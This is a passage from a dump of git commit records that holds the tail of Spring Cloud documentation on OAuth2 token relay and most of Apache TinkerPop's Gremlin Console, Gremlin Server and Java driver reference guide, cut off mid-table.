`RandomValuePropertySource`.\n\n====\n[source,properties,indent=0]\n----\nmyrandom=${cachedrandom.appname.value}\n----\n====\n\n[[spring-cloud-security]]\n== Security\n\n[[spring-cloud-security-single-sign-on]]\n=== Single Sign On\n\nNOTE: All of the OAuth2 SSO and resource server features moved to Spring Boot\nin version 1.3. You can find documentation in the\nhttps:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/[Spring Boot user guide].\n\n[[spring-cloud-security-client-token-relay]]\n==== Client Token Relay\n\nIf your app is a user facing OAuth2 client (i.e. has declared\n`@EnableOAuth2Sso` or `@EnableOAuth2Client`) then it has an\n`OAuth2ClientContext` in request scope from Spring Boot. You can\ncreate your own `OAuth2RestTemplate` from this context and an\nautowired `OAuth2ProtectedResourceDetails`, and then the context will\nalways forward the access token downstream, also refreshing the access\ntoken automatically if it expires. (These are features of Spring\nSecurity and Spring Boot.)\n\n[[spring-cloud-security-resource-server-token-relay]]\n==== Resource Server Token Relay\n\nIf your app has `@EnableResourceServer` you might want to relay the\nincoming token downstream to other services. If you use a\n`RestTemplate` to contact the downstream services then this is just a\nmatter of how to create the template with the right context.\n\nIf your service uses `UserInfoTokenServices` to authenticate incoming\ntokens (i.e. it is using the `security.oauth2.user-info-uri`\nconfiguration), then you can simply create an `OAuth2RestTemplate`\nusing an autowired `OAuth2ClientContext` (it will be populated by the\nauthentication process before it hits the backend code). Equivalently\n(with Spring Boot 1.4), you could inject a\n`UserInfoRestTemplateFactory` and grab its `OAuth2RestTemplate` in\nyour configuration. For example:\n\n.MyConfiguration.java\n[source,java]\n----\n@Bean\npublic OAuth2RestTemplate restTemplate(UserInfoRestTemplateFactory factory) {\n return factory.getUserInfoRestTemplate();\n}\n----\n\nThis rest template will then have the same `OAuth2ClientContext`\n(request-scoped) that is used by the authentication filter, so you can\nuse it to send requests with the same access token.\n\nIf your app is not using `UserInfoTokenServices` but is still a client\n(i.e. it declares `@EnableOAuth2Client` or `@EnableOAuth2Sso`), then\nwith Spring Security Cloud any `OAuth2RestOperations` that the user\ncreates from an `@Autowired` `OAuth2Context` will also forward\ntokens. This feature is implemented by default as an MVC handler\ninterceptor, so it only works in Spring MVC. If you are not using MVC\nyou could use a custom filter or AOP interceptor wrapping an\n`AccessTokenContextRelay` to provide the same feature.\n\nHere's a basic\nexample showing the use of an autowired rest template created\nelsewhere (\"foo.com\" is a Resource Server accepting the same tokens as\nthe surrounding app):\n\n.MyController.java\n[source,java]\n----\n@Autowired\nprivate OAuth2RestOperations restTemplate;\n\n@RequestMapping(\"\/relay\")\npublic String relay() {\n ResponseEntity<String> response =\n restTemplate.getForEntity(\"https:\/\/foo.com\/bar\", String.class);\n return \"Success! (\" + response.getBody() + \")\";\n}\n----\n\nIf you don't want to forward tokens (and that is a valid\nchoice, since you might want to act as yourself, rather than the\nclient that sent you the token), then you only need to create your own\n`OAuth2Context` instead of autowiring the default one.\n\nFeign clients will also pick up an interceptor that uses the\n`OAuth2ClientContext` if it is available, so they should also do a\ntoken relay anywhere where a `RestTemplate` would.\n\n== Configuration Properties\n\nTo see the list of all Spring Cloud Commons related configuration properties please check link:appendix.html[the Appendix page].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a27a04831fa7e43b26d23f14091b615a088eac83","subject":"fixed ssl.keyPassword description","message":"fixed ssl.keyPassword description\n","repos":"apache\/tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,jorgebay\/tinkerpop,pluradj\/incubator-tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,krlohnes\/tinkerpop,apache\/incubator-tinkerpop,apache\/incubator-tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,apache\/incubator-tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop","old_file":"docs\/src\/reference\/gremlin-applications.asciidoc","new_file":"docs\/src\/reference\/gremlin-applications.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n[[gremlin-applications]]\nGremlin Applications\n====================\n\nGremlin applications represent tools that are built on top of the core APIs to help expose common functionality to\nusers when working with graphs. There are two key applications:\n\n. Gremlin Console - A link:http:\/\/en.wikipedia.org\/wiki\/Read%E2%80%93eval%E2%80%93print_loop[REPL] environment for\ninteractive development and analysis\n. Gremlin Server - A server that hosts script engines thus enabling remote Gremlin execution\n\nimage:gremlin-lab-coat.png[width=310,float=left] Gremlin is designed to be extensible, making it possible for users\nand graph system\/language providers to customize it to their needs. Such extensibility is also found in the Gremlin\nConsole and Server, where a universal plugin system makes it possible to extend their capabilities. One of the\nimportant aspects of the plugin system is the ability to help the user install the plugins through the command line\nthus automating the process of gathering dependencies and other error prone activities.\n\nThe process of plugin installation is handled by link:http:\/\/groovy.codehaus.org\/Grape[Grape], which helps resolve\ndependencies into the classpath. It is therefore important to ensure that Grape is properly configured in order to\nuse the automated capabilities of plugin installation. Grape is configured by `~\/.groovy\/grapeConfig.xml` and\ngenerally speaking, if that file is not present, the default settings will suffice. However, they will not suffice\nif a required dependency is not in one of the default configured repositories. Please see the\nlink:http:\/\/groovy.codehaus.org\/Grape[Custom Ivy Settings] section of the Grape documentation for more details on\nthe defaults. TinkerPop recommends the following configuration in that file:\n\n[source,xml]\n<ivysettings>\n <settings defaultResolver=\"downloadGrapes\"\/>\n <resolvers>\n <chain name=\"downloadGrapes\">\n <filesystem name=\"cachedGrapes\">\n <ivy pattern=\"${user.home}\/.groovy\/grapes\/[organisation]\/[module]\/ivy-[revision].xml\"\/>\n <artifact pattern=\"${user.home}\/.groovy\/grapes\/[organisation]\/[module]\/[type]s\/[artifact]-[revision].[ext]\"\/>\n <\/filesystem>\n <ibiblio name=\"codehaus\" root=\"http:\/\/repository.codehaus.org\/\" m2compatible=\"true\"\/>\n <ibiblio name=\"central\" root=\"http:\/\/central.maven.org\/maven2\/\" m2compatible=\"true\"\/>\n <ibiblio name=\"jitpack\" root=\"https:\/\/jitpack.io\" m2compatible=\"true\"\/>\n <ibiblio name=\"java.net2\" root=\"http:\/\/download.java.net\/maven\/2\/\" m2compatible=\"true\"\/>\n <\/chain>\n <\/resolvers>\n<\/ivysettings>\n\nThe Graph configuration can also be modified to include the local system's Maven `.m2` directory by one or both\nof the following entries:\n\n[source,xml]\n<ibiblio name=\"apache-snapshots\" root=\"http:\/\/repository.apache.org\/snapshots\/\" m2compatible=\"true\"\/>\n<ibiblio name=\"local\" root=\"file:${user.home}\/.m2\/repository\/\" m2compatible=\"true\"\/>\n\nThese configurations are useful during development (i.e. if one is working with locally built artifacts) of TinkerPop\nPlugins. It is important to take note of the order used for these references as Grape will check them in the order\nthey are specified and depending on that order, an artifact other than the one expected may be used which is typically\nan issue when working with SNAPSHOT dependencies.\n\nWARNING: If building TinkerPop from source, be sure to clear TinkerPop-related jars from the `~\/.groovy\/grapes`\ndirectory as they can become stale on some systems and not re-import properly from the local `.m2` after fresh rebuilds.\n\n[[gremlin-console]]\nGremlin Console\n---------------\n\nimage:gremlin-console.png[width=325,float=right] The Gremlin Console is an interactive terminal or\nlink:http:\/\/en.wikipedia.org\/wiki\/Read%E2%80%93eval%E2%80%93print_loop[REPL] that can be used to traverse graphs\nand interact with the data that they contain. It represents the most common method for performing ad-hoc graph\nanalysis, small to medium sized data loading projects and other exploratory functions. The Gremlin Console is\nhighly extensible, featuring a rich plugin system that allows new tools, commands,\nlink:http:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSLs], etc. to be exposed to users.\n\nTo start the Gremlin Console, run `gremlin.sh` or `gremlin.bat`:\n\n[source,text]\n----\n$ bin\/gremlin.sh\n\n \\,,,\/\n (o o)\n-----oOOo-(3)-oOOo-----\nplugin loaded: tinkerpop.server\nplugin loaded: tinkerpop.utilities\nplugin loaded: tinkerpop.tinkergraph\ngremlin>\n----\n\nNOTE: If the above plugins are not loaded then they will need to be enabled or else certain examples will not work.\nIf using the standard Gremlin Console distribution, then the plugins should be enabled by default. See below for\nmore information on the `:plugin use` command to manually enable plugins. These plugins, with the exception of\n`tinkerpop.tinkergraph`, cannot be removed from the Console as they are a part of the `gremlin-console.jar` itself.\nThese plugins can only be deactivated.\n\nThe Gremlin Console is loaded and ready for commands. Recall that the console hosts the Gremlin-Groovy language.\nPlease review link:http:\/\/groovy.codehaus.org\/[Groovy] for help on Groovy-related constructs. In short, Groovy is a\nsuperset of Java. What works in Java, works in Groovy. However, Groovy provides many shorthands to make it easier\nto interact with the Java API. Moreoever, Gremlin provides many neat shorthands to make it easier to express paths\nthrough a property graph.\n\n[gremlin-groovy]\n----\ni = 'goodbye'\nj = 'self'\ni + \" \" + j\n\"${i} ${j}\"\n----\n\nThe \"toy\" graph provides a way to get started with Gremlin quickly.\n\n[gremlin-groovy]\n----\ng = TinkerFactory.createModern().traversal(standard())\ng.V()\ng.V().values('name')\ng.V().has('name','marko').out('knows').values('name')\n----\n\nTIP: When using Gremlin-Groovy in a Groovy class file, add `static { GremlinLoader.load() }` to the head of the file.\n\nConsole Commands\n~~~~~~~~~~~~~~~~\n\nIn addition to the standard commands of the link:http:\/\/groovy.codehaus.org\/Groovy+Shell[Groovy Shell], Gremlin adds\nsome other useful operations. The following table outlines the most commonly used commands:\n\n[width=\"100%\",cols=\"3,^2,10\",options=\"header\"]\n|=========================================================\n|Command |Alias |Description\n|:help |:? |Displays list of commands and descriptions. When followed by a command name, it will display more specific help on that particular item.\n|:exit |:x |Ends the Console session.\n|import |:i |Import a class into the Console session.\n|:clear |:c |Sometimes the Console can get into a state where the command buffer no longer understands input (e.g. a misplaced `(` or `}`). Use this command to clear that buffer.\n|:load |:l |Load a file or URL into the command buffer for execution.\n|:install |:+ |Imports a maven library and its dependencies into the Console.\n|:uninstall |:- |Removes a maven library and its dependencies. A restart of the console is required for removal to fully take effect.\n|:plugin |:pin |Plugin management functions to list, activate and deactivate available plugins.\n|:remote |:rem |Configures a \"remote\" context where Gremlin or results of Gremlin will be processed via usage of `:submit`.\n|:submit |:> |Submit Gremlin to the currently active context defined by `:remote`.\n|=========================================================\n\nGremlin Console adds a special `max-iteration` preference that can be configured with the standard `:set` command\nfrom the Groovy Shell. Use this setting to control the maximum number of results that the Console will display.\nConsider the following usage:\n\n[gremlin-groovy]\n----\n:set max-iteration 10\n(0..200)\n:set max-iteration 5\n(0..200)\n----\n\nIf this setting is not present, the console will default the maximum to 100 results.\n\nDependencies and Plugin Usage\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nThe Gremlin Console can dynamically load external code libraries and make them available to the user. Furthermore,\nthose dependencies may contain Gremlin plugins which can expand the language, provide useful functions, etc. These\nimportant console features are managed by the `:install` and `:plugin` commands.\n\nThe following Gremlin Console session demonstrates the basics of these features:\n\n[source,groovy]\n----\ngremlin> :plugin list <1>\n==>tinkerpop.server[active]\n==>tinkerpop.gephi\n==>tinkerpop.utilities[active]\n==>tinkerpop.sugar\n==>tinkerpop.tinkergraph[active]\ngremlin> :plugin use tinkerpop.sugar <2>\n==>tinkerpop.sugar activated\ngremlin> :install org.apache.tinkerpop neo4j-gremlin x.y.z <3>\n==>loaded: [org.apache.tinkerpop, neo4j-gremlin, x.y.z]\ngremlin> :plugin list <4>\n==>tinkerpop.server[active]\n==>tinkerpop.gephi\n==>tinkerpop.utilities[active]\n==>tinkerpop.sugar\n==>tinkerpop.tinkergraph[active]\n==>tinkerpop.neo4j\ngremlin> :plugin use tinkerpop.neo4j <5>\n==>tinkerpop.neo4j activated\ngremlin> :plugin list <6>\n==>tinkerpop.server[active]\n==>tinkerpop.gephi\n==>tinkerpop.sugar[active]\n==>tinkerpop.utilities[active]\n==>tinkerpop.neo4j[active]\n==>tinkerpop.tinkergraph[active]\n----\n\n<1> Show a list of \"available\" plugins. The list of \"available\" plugins is determined by the classes available on\nthe Console classpath. Plugins need to be \"active\" for their features to be available.\n<2> To make a plugin \"active\" execute the `:plugin use` command and specify the name of the plugin to enable.\n<3> Sometimes there are external dependencies that would be useful within the Console. To bring those in, execute\n`:install` and specify the Maven coordinates for the dependency.\n<4> Note that there is a \"tinkerpop.neo4j\" plugin available, but it is not yet \"active\".\n<5> Again, to use the \"tinkerpop.neo4j\" plugin, it must be made \"active\" with `:plugin use`.\n<6> Now when the plugin list is displayed, the \"tinkerpop.neo4j\" plugin is displayed as \"active\".\n\nWARNING: Plugins must be compatible with the version of the Gremlin Console (or Gremlin Server) being used. Attempts\nto use incompatible versions cannot be guaranteed to work. Moreover, be prepared for dependency conflicts in\nthird-party plugins, that may only be resolved via manual jar removal from the `ext\/{plugin}` directory.\n\nTIP: It is possible to manage plugin activation and deactivation by manually editing the `ext\/plugins.txt` file which\ncontains the class names of the \"active\" plugins. It is also possible to clear dependencies added by `:install` by\ndeleting them from the `ext` directory.\n\nScript Executor\n~~~~~~~~~~~~~~~\n\nFor automated tasks and batch executions of Gremlin, it can be useful to execute Gremlin scripts from the command\nline. Consider the following file named `gremlin.groovy`:\n\n[source,groovy]\n----\nimport org.apache.tinkerpop.gremlin.tinkergraph.structure.*\ngraph = TinkerFactory.createModern()\ng = graph.traversal()\ng.V().each { println it }\n----\n\nThis script creates the toy graph and then iterates through all its vertices printing each to the system out. Note\nthat under this approach, \"imports\" need to be explicitly defined (except for \"core\" TinkerPop classes). In addition,\nplugins and other dependencies should already be \"installed\" via console commands which cannot be used with this mode\nof execution. To execute this script from the command line, `gremlin.sh` has the `-e` option used as follows:\n\n[source,bash]\n----\n$ bin\/gremlin.sh -e gremlin.groovy\nv[1]\nv[2]\nv[3]\nv[4]\nv[5]\nv[6]\n----\n\nIt is also possible to pass arguments to scripts. Any parameters following the file name specification are treated\nas arguments to the script. They are collected into a list and passed in as a variable called \"args\". The following\nGremlin script is exactly like the previous one, but it makes use of the \"args\" option to filter the vertices printed\nto system out:\n\n[source,groovy]\n----\nimport org.apache.tinkerpop.gremlin.tinkergraph.structure.*\ngraph = TinkerFactory.createModern()\ng = graph.traversal()\ng.V().has('name',args[0]).each { println it }\n----\n\nWhen executed from the command line a parameter can be supplied:\n\n[source,bash]\n----\n$ bin\/gremlin.sh -e gremlin.groovy marko\nv[1]\n$ bin\/gremlin.sh -e gremlin.groovy vadas\nv[2]\n----\n\nNOTE: The `ScriptExecutor` is for Gremlin Groovy scripts only. It is not possible to include Console plugin commands\nsuch as `:remote` or `:>` when using `-e` in these scripts. That does not mean that it is impossible to script such\ncommands, it just means that they need to be scripted manually. For example, instead of trying to use the `:remote`\ncommand, manually construct a <<connecting-via-java,Gremlin Driver>> `Client` and submit scripts from there.\n\n[[gremlin-server]]\nGremlin Server\n--------------\n\nimage:gremlin-server.png[width=400,float=right] Gremlin Server provides a way to remotely execute Gremlin scripts\nagainst one or more `Graph` instances hosted within it. The benefits of using Gremlin Server include:\n\n* Allows any Gremlin Structure-enabled graph to exist as a standalone server, which in turn enables the ability for\nmultiple clients to communicate with the same graph database.\n* Enables execution of ad-hoc queries through remotely submitted Gremlin scripts.\n* Allows for the hosting of Gremlin-based DSLs (Domain Specific Language) that expand the Gremlin language to match\nthe language of the application domain, which will help support common graph use cases such as searching, ranking,\nand recommendation.\n* Provides a method for Non-JVM languages (e.g. Python, Javascript, etc.) to communicate with the TinkerPop stack.\n* Exposes numerous methods for extension and customization to include serialization options, remote commands, etc.\n\nNOTE: Gremlin Server is the replacement for link:http:\/\/rexster.tinkerpop.com[Rexster].\n\nNOTE: Please see the link:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/dev\/provider\/[Provider Documentation] for information\non how to develop a driver for Gremlin Server.\n\nBy default, communication with Gremlin Server occurs over link:http:\/\/en.wikipedia.org\/wiki\/WebSocket[WebSockets] and\nexposes a custom sub-protocol for interacting with the server.\n\n[[starting-gremlin-server]]\nStarting Gremlin Server\n~~~~~~~~~~~~~~~~~~~~~~~\n\nGremlin Server comes packaged with a script called `bin\/gremlin-server.sh` to get it started (use `gremlin-server.bat`\non Windows):\n\n[source,text]\n----\n$ bin\/gremlin-server.sh conf\/gremlin-server-modern.yaml\n[INFO] GremlinServer -\n \\,,,\/\n (o o)\n-----oOOo-(3)-oOOo-----\n\n[INFO] GremlinServer - Configuring Gremlin Server from conf\/gremlin-server-modern.yaml\n[INFO] MetricManager - Configured Metrics Slf4jReporter configured with interval=180000ms and loggerName=org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics\n[INFO] Graphs - Graph [graph] was successfully configured via [conf\/tinkergraph-empty.properties].\n[INFO] ServerGremlinExecutor - Initialized Gremlin thread pool. Threads in pool named with pattern gremlin-*\n[INFO] ScriptEngines - Loaded gremlin-groovy ScriptEngine\n[INFO] GremlinExecutor - Initialized gremlin-groovy ScriptEngine with scripts\/generate-modern.groovy\n[INFO] ServerGremlinExecutor - Initialized GremlinExecutor and configured ScriptEngines.\n[INFO] ServerGremlinExecutor - A GraphTraversalSource is now bound to [g] with graphtraversalsource[tinkergraph[vertices:0 edges:0], standard]\n[INFO] OpLoader - Adding the standard OpProcessor.\n[INFO] OpLoader - Adding the control OpProcessor.\n[INFO] OpLoader - Adding the session OpProcessor.\n[INFO] GremlinServer - Executing start up LifeCycleHook\n[INFO] Logger$info - Loading 'modern' graph data.\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v1.0+gryo with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v1.0+gryo-stringd with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0\n[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.\n[INFO] GremlinServer$1 - Channel started at port 8182.\n----\n\nGremlin Server is configured by the provided link:http:\/\/www.yaml.org\/[YAML] file `conf\/gremlin-server-modern.yaml`.\nThat file tells Gremlin Server many things such as:\n\n* The host and port to serve on\n* Thread pool sizes\n* Where to report metrics gathered by the server\n* The serializers to make available\n* The Gremlin `ScriptEngine` instances to expose and external dependencies to inject into them\n* `Graph` instances to expose\n\nThe log messages that printed above show a number of things, but most importantly, there is a `Graph` instance named\n`graph` that is exposed in Gremlin Server. This graph is an in-memory TinkerGraph and was empty at the start of the\nserver. An initialization script at `scripts\/generate-modern.groovy` was executed during startup. It's contents are\nas follows:\n\n[source,groovy]\n----\ninclude::{basedir}\/gremlin-server\/scripts\/generate-modern.groovy[]\n----\n\nThe script above initializes a `Map` and assigns two key\/values to it. The first, assigned to \"hook\", defines a\n`LifeCycleHook` for Gremlin Server. The \"hook\" provides a way to tie script code into the Gremlin Server startup and\nshutdown sequences. The `LifeCycleHook` has two methods that can be implemented: `onStartUp` and `onShutDown`.\nThese events are called once at Gremlin Server start and once at Gremlin Server stop. This is an important point\nbecause code outside of the \"hook\" is executed for each `ScriptEngine` creation (multiple may be created when\n\"sessions\" are enabled) and therefore the `LifeCycleHook` provides a way to ensure that a script is only executed a\nsingle time. In this case, the startup hook loads the \"modern\" graph into the empty TinkerGraph instance, preparing\nit for use. The second key\/value pair assigned to the `Map`, named \"g\", defines a `TraversalSource` from the `Graph`\nbound to the \"graph\" variable in the YAML configuration file. This variable `g`, as well as any other variable\nassigned to the `Map`, will be made available as variables for future remote script executions. In more general\nterms, any key\/value pairs assigned to a `Map` returned from the initialization script will become variables that\nare global to all requests. In addition, any functions that are defined will be cached for future use.\n\nWARNING: Transactions on graphs in initialization scripts are not closed automatically after the script finishes\nexecuting. It is up to the script to properly commit or rollback transactions in the script itself.\n\n[[connecting-via-console]]\nConnecting via Console\n~~~~~~~~~~~~~~~~~~~~~~\n\nWith Gremlin Server running it is now possible to issue some scripts to it for processing. Start Gremlin Console as\nfollows:\n\n[source,text]\n----\n$ bin\/gremlin.sh\n\n \\,,,\/\n (o o)\n-----oOOo-(3)-oOOo-----\ngremlin>\n----\n\nThe console has the notion of a \"remote\", which represents a place a script will be sent from the console to be\nevaluated elsewhere in some other context (e.g. Gremlin Server, Hadoop, etc.). To create a remote in the console,\ndo the following:\n\n[gremlin-groovy]\n----\n:remote connect tinkerpop.server conf\/remote.yaml\n----\n\nThe `:remote` command shown above displays the current status of the remote connection. This command can also be\nused to configure a new connection and change other related settings. To actually send a script to the server a\ndifferent command is required:\n\n[gremlin-groovy]\n----\n:> g.V().values('name')\n:> g.V().has('name','marko').out('created').values('name')\n:> g.E().label().groupCount()\nresult\n:remote close\n----\n\nThe `:>` command, which is a shorthand for `:submit`, sends the script to the server to execute there. Results are\nwrapped in an `Result` object which is a just a holder for each individual result. The `class` shows the data type\nfor the containing value. Note that the last script sent was supposed to return a `Map`, but its `class` is\n`java.lang.String`. By default, the connection is configured to only return text results. In other words,\nGremlin Server is using `toString` to serialize all results back to the console. This enables virtually any\nobject on the server to be returned to the console, but it doesn't allow the opportunity to work with this data\nin any way in the console itself. A different configuration of the `:remote` is required to get the results back\nas \"objects\":\n\n[gremlin-groovy]\n----\n:remote connect tinkerpop.server conf\/remote-objects.yaml <1>\n:remote list <2>\n:> g.E().label().groupCount() <3>\nm = result[0].object <4>\nm.sort {it.value}\nscript = \"\"\"\n matthias = graph.addVertex('name','matthias')\n matthias.addEdge('co-creator',g.V().has('name','marko').next())\n \"\"\"\n:> @script <5>\n:> g.V().has('name','matthias').out('co-creator').values('name')\n:remote close\n----\n\n<1> This configuration file specifies that results should be deserialized back into an `Object` in the console with\nthe caveat being that the server and console both know how to serialize and deserialize the result to be returned.\n<2> There are now two configured remote connections. The one marked by an asterisk is the one that was just created\nand denotes the current one that `:sumbit` will react to.\n<3> When the script is executed again, the `class` is no longer shown to be a `java.lang.String`. It is instead a `java.util.HashMap`.\n<4> The last result of a remote script is always stored in the reserved variable `result`, which allows access to\nthe `Result` and by virtue of that, the `Map` itself.\n<5> If the submission requires multiple-lines to express, then a multi-line string can be created. The `:>` command\nrealizes that the user is referencing a variable via `@` and submits the string script.\n\nTIP: In Groovy, `\"\"\" text \"\"\"` is a convenient way to create a multi-line string and works well in concert with\n`:> @variable`. Note that this model of submitting a string variable works for all `:>` based plugins, not just Gremlin Server.\n\nWARNING: Not all values that can be returned from a Gremlin script end up being serializable. For example,\nsubmitting `:> graph` will return a `Graph` instance and in most cases those are not serializable by Gremlin Server\nand will return a serialization error. It should be noted that `TinkerGraph`, as a convenience for shipping around\nsmall sub-graphs, is serializable from Gremlin Server.\n\nThe Gremlin Server `:remote config` command for the driver has the following configuration options:\n\n[width=\"100%\",cols=\"3,10a\",options=\"header\"]\n|=========================================================\n|Command |Description\n|alias |\n[width=\"100%\",cols=\"3,10\",options=\"header\"]\n!=========================================================\n!Option !Description\n! _pairs_ !A set of key\/value alias\/binding pairs to apply to requests.\n!`reset` !Clears any aliases that were supplied in previous configurations of the remote.\n!`show` !Shows the current set of aliases which is returned as a `Map`\n!=========================================================\n|timeout |Specifies the length of time in milliseconds a will wait for a response from the server. Specify \"none\" to\nhave no timeout. By default, this setting uses \"none\".\n|=========================================================\n\n[[console-aliases]]\nAliases\n^^^^^^^\n\nThe `alias` configuration command for the Gremlin Server `:remote` can be useful in situations where there are\nmultiple `Graph` or `TraversalSource` instances on the server, as it becomes possible to rename them from the client\nfor purposes of execution within the context of a script. Therefore, it becomes possible to submit commands this way:\n\n[gremlin-groovy]\n----\n:remote connect tinkerpop.server conf\/remote-objects.yaml\n:remote config alias x g\n:> x.E().label().groupCount()\n----\n\n[[console-sessions]]\nSessions\n^^^^^^^^\n\nA `:remote` created in the following fashion will be \"sessionless\", meaning each script issued to the server with\n`:>` will be encased in a transaction and no state will be maintained from one request to the next.\n\n[gremlin-groovy]\n----\n:remote connect tinkerpop.server conf\/remote-objects.yaml\n----\n\nIn other words, the transaction will be automatically committed (or rolledback on error) and any variables declared\nin that script will be forgotten for the next request. See the section on <<sessions, \"Considering Sessions\">>\nfor more information on that topic.\n\nTo enable the remote to connect with a session the `connect` argument takes another argument as follows:\n\n[gremlin-groovy]\n----\n:remote connect tinkerpop.server conf\/remote.yaml session\n:> x = 1\n:> y = 2\n:> x + y\n----\n\nWith the above command a session gets created with a random UUID for a session identifier. It is also possible to\nassign a custom session identifier by adding it as the last argument to `:remote` command above. There is also the\noption to replace \"session\" with \"session-managed\" to create a session that will auto-manage transactions (i.e. each\nrequest will occur within the bounds of a transaction). In this way, the state of bound variables between requests are\nmaintained, but the need to manually managed the transactional scope of the graph is no longer required.\n\n[[console-remote-console]]\nRemote Console\n^^^^^^^^^^^^^^\n\nPrevious examples have shown usage of the `:>` command to send scripts to Gremlin Server. The Gremlin Console also\nsupports an additional method for doing this which can be more convenient when the intention is to exclusively\nwork with a remote connection to the server.\n\n[gremlin-groovy]\n----\n:remote connect tinkerpop.server conf\/remote.yaml session\n:remote console\nx = 1\ny = 2\nx + y\n:remote console\n----\n\nIn the above example, the `:remote console` command is executed. It places the console in a state where the `:>` is\nno longer required. Each script line is actually automatically submitted to Gremlin Server for evalaution. The\nvariables `x` and `y` that were defined actually don't exist locally - they only exist on the server! In this sense,\nputting the console in this mode is basically like creating a window to a session on Gremlin Server.\n\nTIP: When using `:remote console` there is not much point to using a configuration that uses a serializer that returns\nactual data. In other words, using a configuration like the one inside of `conf\/remote-objects.yaml` isn't typically\nuseful as in this mode the result will only ever be displayed but not used. Using a serializer configuration like\nthe one in `conf\/remote.yaml` should perform better.\n\nNOTE: Console commands, those that begin with a colon (e.g. `:x`, `:remote`) do not execute remotely when in this mode.\nThey are all still evaluated locally.\n\n[[connecting-via-java]]\nConnecting via Java\n~~~~~~~~~~~~~~~~~~~\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.tinkerpop<\/groupId>\n <artifactId>gremlin-driver<\/artifactId>\n <version>x.y.z<\/version>\n<\/dependency>\n----\n\nimage:gremlin-java.png[width=175,float=left] TinkerPop3 comes equipped with a reference client for Java-based\napplications. It is referred to as Gremlin Driver, which enables applications to send requests to Gremlin Server\nand get back results.\n\nGremlin code is sent to the server from a `Client` instance. A `Client` is created as follows:\n\n[source,java]\n----\nCluster cluster = Cluster.open(); <1>\nClient client = cluster.connect(); <2>\n----\n\n<1> Opens a reference to `localhost` - note that there are many configuration options available in defining a `Cluster` object.\n<2> Creates a `Client` given the configuration options of the `Cluster`.\n\nOnce a `Client` instance is ready, it is possible to issue some Gremlin:\n\n[source,java]\n----\nResultSet results = client.submit(\"[1,2,3,4]\"); <1>\nresults.stream().map(i -> i.get(Integer.class) * 2); <2>\n\nCompletableFuture<List<Result>> results = client.submit(\"[1,2,3,4]\").all(); <3>\n\nCompletableFuture<ResultSet> future = client.submitAsync(\"[1,2,3,4]\"); <4>\n\nMap<String,Object> params = new HashMap<>();\nparams.put(\"x\",4);\nclient.submit(\"[1,2,3,x]\", params); <5>\n----\n\n<1> Submits a script that simply returns a `List` of integers. This method blocks until the request is written to\nthe server and a `ResultSet` is constructed.\n<2> Even though the `ResultSet` is constructed, it does not mean that the server has sent back the results (or even\nevaluated the script potentially). The `ResultSet` is just a holder that is awaiting the results from the server.\nIn this case, they are streamed from the server as they arrive.\n<3> Submit a script, get a `ResultSet`, then return a `CompletableFuture` that will be called when all results have been returned.\n<4> Submit a script asynchronously without waiting for the request to be written to the server.\n<5> Parameterized request are considered the most efficient way to send Gremlin to the server as they can be cached,\nwhich will boost performance and reduce resources required on the server.\n\nConfiguration\n^^^^^^^^^^^^^\n\nThe following table describes the various configuration options for the Gremlin Driver:\n\n[width=\"100%\",cols=\"3,10,^2\",options=\"header\"]\n|=========================================================\n|Key |Description |Default\n|connectionPool.channelizer |The fully qualified classname of the client `Channelizer` that defines how to connect to the server. |`Channelizer.WebSocketChannelizer`\n|connectionPool.enableSsl |Determines if SSL should be enabled or not. If enabled on the server then it must be enabled on the client. |false\n|connectionPool.keyCertChainFile |The X.509 certificate chain file in PEM format. |_none_\n|connectionPool.keyFile |The `PKCS#8` private key file in PEM format. |_none_\n|connectionPool.keyPassword |The password of the `keyFile` if it is password-protected |_none_\n|connectionPool.maxContentLength |The maximum length in bytes that a message can be sent to the server. This number can be no greater than the setting of the same name in the server configuration. |65536\n|connectionPool.maxInProcessPerConnection |The maximum number of in-flight requests that can occur on a connection. |4\n|connectionPool.maxSimultaneousUsagePerConnection |The maximum number of times that a connection can be borrowed from the pool simultaneously. |16\n|connectionPool.maxSize |The maximum size of a connection pool for a host. |8\n|connectionPool.maxWaitForConnection |The amount of time in milliseconds to wait for a new connection before timing out. |3000\n|connectionPool.maxWaitForSessionClose |The amount of time in milliseconds to wait for a session to close before timing out (does not apply to sessionless connections). |3000\n|connectionPool.minInProcessPerConnection |The minimum number of in-flight requests that can occur on a connection. |1\n|connectionPool.minSimultaneousUsagePerConnection |The maximum number of times that a connection can be borrowed from the pool simultaneously. |8\n|connectionPool.minSize |The minimum size of a connection pool for a host. 